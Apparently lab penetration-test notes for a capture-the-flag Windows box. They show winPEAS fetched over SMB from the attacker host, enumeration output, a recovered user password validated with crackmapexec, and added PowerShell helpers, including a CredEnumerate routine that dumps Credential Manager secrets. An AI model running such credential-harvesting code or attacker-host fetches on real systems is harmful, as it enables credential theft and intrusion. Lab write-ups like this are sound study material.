PEAS
PS C:\> mkdir tmp ; cd tmp ; copy \\10.10.14.23\smb\winPEASx64.exe .
Delivery complete over SMB
Executing PEAS
Updates
╔══════════╣ Showing All Microsoft Updates
HotFix ID : KB4601554
Installed At (UTC) : 4/5/2021 11:33:15 AM
Title : 2021-02 Cumulative Update Preview for .NET Framework 3.5 and 4.8 for Windows 10, version 20H2 for x64 (KB4601554)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
=================================================================================================
HotFix ID : KB4589212
Installed At (UTC) : 4/5/2021 11:31:44 AM
Title : 2021-01 Update for Windows 10 Version 20H2 for x64-based Systems (KB4589212)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
===============================================================
HotFix ID : KB4577586
Installed At (UTC) : 4/5/2021 11:31:35 AM
Title : Update for Removal of Adobe Flash Player for Windows 10 Version 20H2 for x64-based systems (KB4577586)
Client Application ID : MoUpdateOrchestrator
Description : This update will remove Adobe Flash Player from your Windows machine. After you install this item, you may have to restart your computer.
=================================================================================================
HotFix ID : KB5000842
Installed At (UTC) : 4/5/2021 10:52:37 AM
Title : 2021-03 Cumulative Update Preview for Windows 10 Version 20H2 for x64-based Systems (KB5000842)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
=================================================================================================
HotFix ID : KB5000802
Installed At (UTC) : 4/3/2021 9:52:24 AM
Title : 2021-03 Cumulative Update for Windows 10 Version 20H2 for x64-based Systems (KB5000802)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
=================================================================================================
HotFix ID : KB4023057
Installed At (UTC) : 4/3/2021 9:38:34 AM
Title : 2021-01 Update for Windows 10 Version 20H2 for x64-based Systems (KB4023057)
Client Application ID : MoUpdateOrchestrator
Description : A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
=================================================================================================
HotFix ID : KB4601050
Installed At (UTC) : 4/3/2021 9:38:33 AM
Title : 2021-02 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10, version 20H2 for x64 (KB4601050)
Client Application ID : MoUpdateOrchestrator
Description : A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
=================================================================================================
HotFix ID : KB2267602
Installed At (UTC) : 4/1/2021 8:18:26 PM
Title : Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.333.1767.0)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to revise the files that are used to detect viruses, spyware, and other potentially unwanted software. Once you have installed this item, it cannot be removed.
=================================================================================================
HotFix ID : KB4052623
Installed At (UTC) : 4/1/2021 8:17:33 PM
Title : Update for Microsoft Defender Antivirus antimalware platform - KB4052623 (Version 4.18.2102.4)
Client Application ID : MoUpdateOrchestrator
Description : This package will update Microsoft Defender Antivirus antimalware platform's components on the user machine.
=================================================================================================
HotFix ID : KB2267602
Installed At (UTC) : 4/1/2021 6:12:43 PM
Title : Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.333.1761.0)
Client Application ID : Microsoft Defender Antivirus (77BDAF73-B396-481F-9042-AD358843EC24)
Description : Install this update to revise the files that are used to detect viruses, spyware, and other potentially unwanted software. Once you have installed this item, it cannot be removed.
=================================================================================================
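The list above is the Windows Update Agent history, not the output of Get-HotFix: Defender signature and platform updates (KB2267602, KB4052623) appear here but are never recorded in Win32_QuickFixEngineering. The following is an added example, not part of the original notes, that reads the same history through the Microsoft.Update.Session COM object and reduces it to the two facts a tester wants: the last successfully installed cumulative update and how old it is. The 60-day staleness threshold is an assumption.

```powershell
# Added example (not from the original notes): summarise Windows Update history
# via the Microsoft.Update.Session COM object. $StaleAfterDays is an arbitrary
# assumption, not a Microsoft-defined threshold.
function Get-UpdateHistorySummary {
    param([int]$StaleAfterDays = 60)

    $session  = New-Object -ComObject Microsoft.Update.Session
    $searcher = $session.CreateUpdateSearcher()
    $total    = $searcher.GetTotalHistoryCount()
    if ($total -eq 0) { return $null }

    # Operation 1 = installation; ResultCode 2 = succeeded, 3 = succeeded with errors.
    $entries = @($searcher.QueryHistory(0, $total) |
        Where-Object { $_.Operation -eq 1 -and $_.ResultCode -in 2, 3 } |
        ForEach-Object {
            $kb = if ($_.Title -match 'KB(\d+)') { "KB$($Matches[1])" } else { '' }
            [pscustomobject]@{
                Installed    = $_.Date                      # recorded in UTC by the agent
                KB           = $kb
                Title        = $_.Title
                Client       = $_.ClientApplicationID       # e.g. MoUpdateOrchestrator
                IsCumulative = $_.Title -match 'Cumulative Update( Preview)? for Windows'
            }
        } | Sort-Object Installed -Descending)

    $lastCu = $entries | Where-Object IsCumulative | Select-Object -First 1
    $days   = if ($lastCu) { [int]((Get-Date).ToUniversalTime() - $lastCu.Installed).TotalDays } else { $null }

    [pscustomobject]@{
        TotalInstalled     = $entries.Count
        LastCumulativeKB   = if ($lastCu) { $lastCu.KB } else { $null }
        LastCumulativeDate = if ($lastCu) { $lastCu.Installed } else { $null }
        DaysSinceLastCU    = $days
        Stale              = (-not $lastCu) -or ($days -gt $StaleAfterDays)
        # Defender signature/platform updates show up here but not in Get-HotFix,
        # so a long Get-HotFix list is not evidence of current AV signatures.
        DefenderUpdates    = @($entries | Where-Object Title -like '*Defender*').Count
        History            = $entries
    }
}

$summary = Get-UpdateHistorySummary
$summary | Select-Object TotalInstalled, LastCumulativeKB, LastCumulativeDate, DaysSinceLastCU, Stale, DefenderUpdates
$summary.History | Select-Object Installed, KB, Title | Format-Table -AutoSize
```

On the host above this would report KB5000802 (2021-03 Cumulative Update, installed 2021-04-03 UTC) as the last cumulative update; whether that is "stale" depends on when the test is run, which is why the threshold is a parameter. The KB numbers alone do not establish any exploitable condition; they only date the patch level.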
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
computername: ATOM
psexecutionpolicypreference: Bypass
homepath: \Users\jason
localappdata: C:\Users\jason\AppData\Local
psmodulepath: C:\Users\jason\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\
processor_architecture: AMD64
path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files\nodejs\;C:\WINDOWS\System32\OpenSSH\;C:\Users\jason\AppData\Roaming\npm;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps
commonprogramfiles(x86): C:\Program Files (x86)\Common Files
programfiles(x86): C:\Program Files (x86)
processor_level: 23
logonserver: \\ATOM
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
homedrive: C:
systemroot: C:\WINDOWS
allusersprofile: C:\ProgramData
driverdata: C:\Windows\System32\Drivers\DriverData
userprofile: C:\Users\jason
appdata: C:\Users\jason\AppData\Roaming
processor_revision: 3100
username: jason
commonprogramw6432: C:\Program Files\Common Files
onedrive: C:\Users\jason\OneDrive
commonprogramfiles: C:\Program Files\Common Files
os: Windows_NT
userdomain_roamingprofile: ATOM
processor_identifier: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
comspec: C:\WINDOWS\system32\cmd.exe
prompt: $P$G
systemdrive: C:
temp: C:\Users\jason\AppData\Local\Temp
programfiles: C:\Program Files
tmp: C:\Users\jason\AppData\Local\Temp
programdata: C:\ProgramData
programw6432: C:\Program Files
windir: C:\WINDOWS
userdomain: ATOM
public: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
comspec: C:\WINDOWS\system32\cmd.exe
driverdata: C:\Windows\System32\Drivers\DriverData
os: Windows_NT
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
processor_architecture: AMD64
temp: C:\WINDOWS\TEMP
tmp: C:\WINDOWS\TEMP
username: SYSTEM
windir: C:\WINDOWS
number_of_processors: 2
processor_level: 23
processor_identifier: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
processor_revision: 3100
path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files\nodejs\;C:\WINDOWS\System32\OpenSSH\
psmodulepath: C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\
LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
NTLM
GP
Printers
╔══════════╣ Enumerating Printers (WMI)
name: Microsoft XPS Document Writer
status: Unknown
sddl: O:SYD:(A;;SWRC;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;OIIO;RPWPSDRCWDWO;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;;LCSWSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================
name: Microsoft Print to PDF
status: Unknown
sddl: O:SYD:(A;;SWRC;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;OIIO;RPWPSDRCWDWO;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;;LCSWSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: True
is network printer: False
=================================================================================================
name: Fax
status: Unknown
sddl: O:SYD:(A;;SWRC;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;OIIO;RPWPSDRCWDWO;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;;LCSWSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
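The three printer DACLs are identical, and the interesting ACE in each is `(A;;LCSWSDRCWDWO;;;S-1-5-21-...-1001)`: in SDDL the letters LC and SW are the bits 0x4 and 0x8, which on a printer object are PRINTER_ACCESS_ADMINISTER and PRINTER_ACCESS_USE, and SD/RC/WD/WO are DELETE, READ_CONTROL, WRITE_DAC and WRITE_OWNER. So the local account with RID 1001 has full administrative control of every printer object. Note that this is not jason's account (his SID, from the AutoLogonSID value further down, ends in -1002); jason only gets the Everyone (WD) grant, PRINTER_ACCESS_USE plus READ_CONTROL. The following is an added example, not part of the original notes, that decodes such an SDDL with .NET's RawSecurityDescriptor and names the printer-specific bits from winspool.h; the sample input is the XPS Document Writer DACL copied from the output above.

```powershell
# Added example (not from the original notes): decode a printer DACL from SDDL.
# Bit values are the winspool.h / winnt.h constants; the letters in the comments
# are how the same bits appear in the SDDL strings winPEAS printed.
$PrinterRights = @(
    @{ Bit = [uint32]0x00000004; Name = 'PRINTER_ACCESS_ADMINISTER' }      # LC
    @{ Bit = [uint32]0x00000008; Name = 'PRINTER_ACCESS_USE' }             # SW
    @{ Bit = [uint32]0x00000010; Name = 'JOB_ACCESS_ADMINISTER' }          # RP (job ACEs)
    @{ Bit = [uint32]0x00000020; Name = 'JOB_ACCESS_READ' }                # WP (job ACEs)
    @{ Bit = [uint32]0x00000040; Name = 'PRINTER_ACCESS_MANAGE_LIMITED' }  # DT
    @{ Bit = [uint32]0x00010000; Name = 'DELETE' }                         # SD
    @{ Bit = [uint32]0x00020000; Name = 'READ_CONTROL' }                   # RC
    @{ Bit = [uint32]0x00040000; Name = 'WRITE_DAC' }                      # WD
    @{ Bit = [uint32]0x00080000; Name = 'WRITE_OWNER' }                    # WO
    @{ Bit = [uint32]0x10000000; Name = 'GENERIC_ALL' }                    # GA
    @{ Bit = [uint32]0x20000000; Name = 'GENERIC_EXECUTE' }                # GX
    @{ Bit = [uint32]0x40000000; Name = 'GENERIC_WRITE' }                  # GW
    @{ Bit = [uint32]0x80000000; Name = 'GENERIC_READ' }                   # GR
)

function ConvertFrom-PrinterSddl {
    param([Parameter(Mandatory = $true)][string]$Sddl)

    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $mask  = [uint32]($ace.AccessMask -band 0xFFFFFFFF)
        $names = foreach ($r in $PrinterRights) { if ($mask -band $r.Bit) { $r.Name } }

        # Inherit-only ACEs (IO, flag 0x8) never apply to the printer itself; with
        # OI they describe what the principal may do to jobs created under it.
        $inheritOnly = ([int]$ace.AceFlags -band 8) -ne 0

        $sid = $ace.SecurityIdentifier
        $principal = $sid.Value
        try { $principal = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }

        # Administer, WRITE_DAC, WRITE_OWNER or GENERIC_ALL on the printer object
        # lets the principal reconfigure it or rewrite its ACL.
        $adminBits = [uint32](0x4 -bor 0x40000 -bor 0x80000 -bor 0x10000000)
        [pscustomobject]@{
            Type         = $ace.AceType
            Principal    = $principal
            AppliesTo    = if ($inheritOnly) { 'print jobs' } else { 'printer' }
            Rights       = ($names -join ', ')
            AdminControl = (-not $inheritOnly) -and (($mask -band $adminBits) -ne 0)
        }
    }
}

# Constructed input: the DACL winPEAS printed above for "Microsoft XPS Document Writer".
$xpsSddl = 'O:SYD:(A;;SWRC;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;OIIO;RPWPSDRCWDWO;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;;LCSWSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)'
ConvertFrom-PrinterSddl -Sddl $xpsSddl | Format-Table Principal, AppliesTo, Rights, AdminControl -AutoSize
```

Run on the target, SID translation turns the RID 1001 entry into a local account name; run elsewhere it falls back to the raw SID. The S-1-15-3-1024-... principals are app-container capability SIDs and never translate. The rows flagged AdminControl are BUILTIN\Administrators and the RID 1001 account; nothing in this DACL gives a non-admin user more than use and read-control over the printer object, so this is an observation to record, not a privilege-escalation path by itself.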
.NET Version
Token Privileges
Logged Users
RDP?
HOMEDIR
AutoLogon
PS C:\WINDOWS\system32> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
LastLogOffEndTimePerfCounter REG_QWORD 0x2e449c8b1
ShutdownFlags REG_DWORD 0x8000022b
AutoAdminLogon REG_SZ 1
DefaultDomainName REG_SZ ATOM
DefaultUserName REG_SZ jason
IsConnectedAutoLogon REG_DWORD 0x0
DisableCad REG_DWORD 0x1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-1199094703-3580107816-3092147818-1002
LastUsedUsername REG_SZ jason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
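AutoAdminLogon is "1" with DefaultUserName jason, but there is no DefaultPassword value in the key. That is the expected shape when auto-logon was configured with Sysinternals Autologon or the netplwiz dialog: the password is then kept as the LSA secret DefaultPassword under HKLM\SECURITY\Policy\Secrets, which only SYSTEM can read, rather than as a world-readable REG_SZ. So a non-privileged shell cannot get the password from here; on this host it surfaced from Credential Manager instead (see below). The following is an added example, not part of the original notes, that makes that decision explicit. By default it reads the live Winlogon key; the -Winlogon parameter accepts any object with the same property names, and the sample object is built from the reg query output above.

```powershell
# Added example (not from the original notes): evaluate the Winlogon auto-logon
# configuration and say where the password is expected to be.
function Test-AutoLogon {
    param(
        $Winlogon = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon')
    )

    $enabled = "$($Winlogon.AutoAdminLogon)" -eq '1'     # REG_SZ "1", not a DWORD
    $user    = $Winlogon.DefaultUserName
    $domain  = if ($Winlogon.DefaultDomainName) { $Winlogon.DefaultDomainName } else { $env:COMPUTERNAME }

    # A DefaultPassword value in the Winlogon key is cleartext and readable by any local user.
    $clear = $Winlogon.DefaultPassword

    # Sysinternals Autologon / netplwiz store the password as the LSA secret
    # DefaultPassword instead. The SECURITY hive is readable only as SYSTEM, so
    # this probe is meaningful only in that context and is simply $false elsewhere.
    $lsaKeyVisible = [bool](Test-Path 'HKLM:\SECURITY\Policy\Secrets\DefaultPassword' -ErrorAction SilentlyContinue)

    # Cross-check AutoLogonSID against the SID the account name resolves to on this host.
    $sidMatches = $null
    if ($Winlogon.AutoLogonSID -and $user) {
        try {
            $resolved = ([System.Security.Principal.NTAccount]"$domain\$user").Translate(
                            [System.Security.Principal.SecurityIdentifier]).Value
            $sidMatches = $resolved -eq $Winlogon.AutoLogonSID
        } catch { }
    }

    $where = 'not in Winlogon key; dump LSA secrets as SYSTEM or check Credential Manager'
    if (-not $enabled)      { $where = 'auto-logon disabled' }
    elseif ($clear)         { $where = 'cleartext DefaultPassword in Winlogon key' }
    elseif ($lsaKeyVisible) { $where = 'LSA secret DefaultPassword (readable in this SYSTEM context)' }

    [pscustomobject]@{
        Enabled          = $enabled
        Account          = "$domain\$user"
        AutoLogonCount   = $Winlogon.AutoLogonCount    # present only for one-shot auto-logons
        SidMatchesUser   = $sidMatches
        ClearPassword    = $clear
        PasswordLocation = $where
    }
}

# Constructed from the reg query output above: enabled, ATOM\jason, no DefaultPassword value.
$fromPage = [pscustomobject]@{
    AutoAdminLogon    = '1'
    DefaultDomainName = 'ATOM'
    DefaultUserName   = 'jason'
    DefaultPassword   = $null
    AutoLogonSID      = 'S-1-5-21-1199094703-3580107816-3092147818-1002'
}
Test-AutoLogon -Winlogon $fromPage | Format-List
```

For the sample object this reports Enabled True, Account ATOM\jason, ClearPassword empty and PasswordLocation "not in Winlogon key; dump LSA secrets as SYSTEM or check Credential Manager". SidMatchesUser is $null off the box because ATOM\jason does not resolve there; on the target it compares the resolved SID with the stored AutoLogonSID ending in -1002.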
Modifiable Services
Installed Programs
Scheduled Tasks
SMB
UDP
Credential Manager
jason:kidvscat_electron_@123
PS C:\> cmdkey /list
Currently stored credentials:
    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02qqfqypcqyxtlej
    Local machine persistence
    Target: LegacyGeneric:target=ATOM\jason
    Type: Generic
    User: ATOM\jason
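cmdkey /list shows the targets and user names but never the secrets. The LegacyGeneric:target=ATOM\jason entry is of type Generic, and for Generic credentials the CredEnumerate API returns the credential blob to the owning user without elevation; that is how the Credential Manager check above produced jason's password. Windows-type (domain password) entries, such as saved RDP logons, come back with an empty blob and need the DPAPI master-key route instead. The following is an added example, not part of the original notes, that calls CredEnumerate through P/Invoke and decodes Generic blobs; the didlogical entry's blob is binary, so it is shown as hex rather than as text.

```powershell
# Added example (not from the original notes): enumerate Credential Manager with
# CredEnumerate and decode the secret of Generic entries.
$credApi = @"
using System;
using System.Runtime.InteropServices;
public static class CredApi {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct CREDENTIAL {
        public uint   Flags;
        public uint   Type;
        public string TargetName;
        public string Comment;
        public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten;
        public uint   CredentialBlobSize;
        public IntPtr CredentialBlob;
        public uint   Persist;
        public uint   AttributeCount;
        public IntPtr Attributes;
        public string TargetAlias;
        public string UserName;
    }
    [DllImport("advapi32.dll", EntryPoint = "CredEnumerateW", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool CredEnumerate(string filter, uint flags, out uint count, out IntPtr credentials);
    [DllImport("advapi32.dll")]
    public static extern void CredFree(IntPtr buffer);
}
"@
if (-not ('CredApi' -as [type])) { Add-Type -TypeDefinition $credApi }

function Get-StoredCredential {
    $types   = @{ 1 = 'Generic'; 2 = 'DomainPassword'; 3 = 'DomainCertificate'; 4 = 'DomainVisiblePassword'; 5 = 'GenericCertificate'; 6 = 'DomainExtended' }
    $persist = @{ 1 = 'Session'; 2 = 'LocalMachine'; 3 = 'Enterprise' }   # "Local machine persistence" in cmdkey

    [uint32]$count = 0
    [IntPtr]$list  = [IntPtr]::Zero
    if (-not [CredApi]::CredEnumerate($null, 0, [ref]$count, [ref]$list)) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        if ($err -eq 1168) { return }                     # ERROR_NOT_FOUND: nothing stored
        throw "CredEnumerate failed: Win32 error $err"
    }
    try {
        for ($i = 0; $i -lt $count; $i++) {
            $p = [Runtime.InteropServices.Marshal]::ReadIntPtr($list, $i * [IntPtr]::Size)
            $c = [Runtime.InteropServices.Marshal]::PtrToStructure($p, [type][CredApi+CREDENTIAL])

            # Only Generic entries hand the blob to an ordinary caller; DomainPassword
            # entries (type 2) are returned with CredentialBlobSize 0 by design.
            $secret = $null
            if ($c.CredentialBlobSize -gt 0 -and $c.CredentialBlob -ne [IntPtr]::Zero) {
                $bytes = New-Object byte[] $c.CredentialBlobSize
                [Runtime.InteropServices.Marshal]::Copy($c.CredentialBlob, $bytes, 0, $bytes.Length)
                # cmdkey /generic writes UTF-16LE text; other apps store raw bytes, shown as hex.
                $text   = [Text.Encoding]::Unicode.GetString($bytes)
                $secret = if ($text -match '^[\x20-\x7E]+$') { $text } else { 'hex:' + [BitConverter]::ToString($bytes) }
            }
            [pscustomobject]@{
                Target   = $c.TargetName
                Type     = $types[[int]$c.Type]
                Persist  = $persist[[int]$c.Persist]
                UserName = $c.UserName
                Secret   = $secret
            }
        }
    } finally {
        [CredApi]::CredFree($list)
    }
}

Get-StoredCredential | Format-Table Target, Type, Persist, UserName, Secret -AutoSize
```

This runs in the user's own session, so it reads only that user's vault and needs no privilege; the blobs are DPAPI-protected with the user's own key and the API decrypts them transparently. Another user's stored credentials, or DomainPassword entries, are not reachable this way.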
Validation
└─$ crackmapexec smb $IP -u 'jason' -p 'kidvscat_electron_@123' --shares
SMB 10.10.10.237 445 ATOM [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB 10.10.10.237 445 ATOM [+] ATOM\jason:kidvscat_electron_@123
SMB 10.10.10.237 445 ATOM [+] Enumerated shares
SMB 10.10.10.237 445 ATOM Share Permissions Remark
SMB 10.10.10.237 445 ATOM ----- ----------- ------
SMB 10.10.10.237 445 ATOM ADMIN$ Remote Admin
SMB 10.10.10.237 445 ATOM C$ Default share
SMB 10.10.10.237 445 ATOM IPC$ Remote IPC
SMB 10.10.10.237 445 ATOM Software_Updates READ,WRITE
Validated
Recent cmd
DPAPI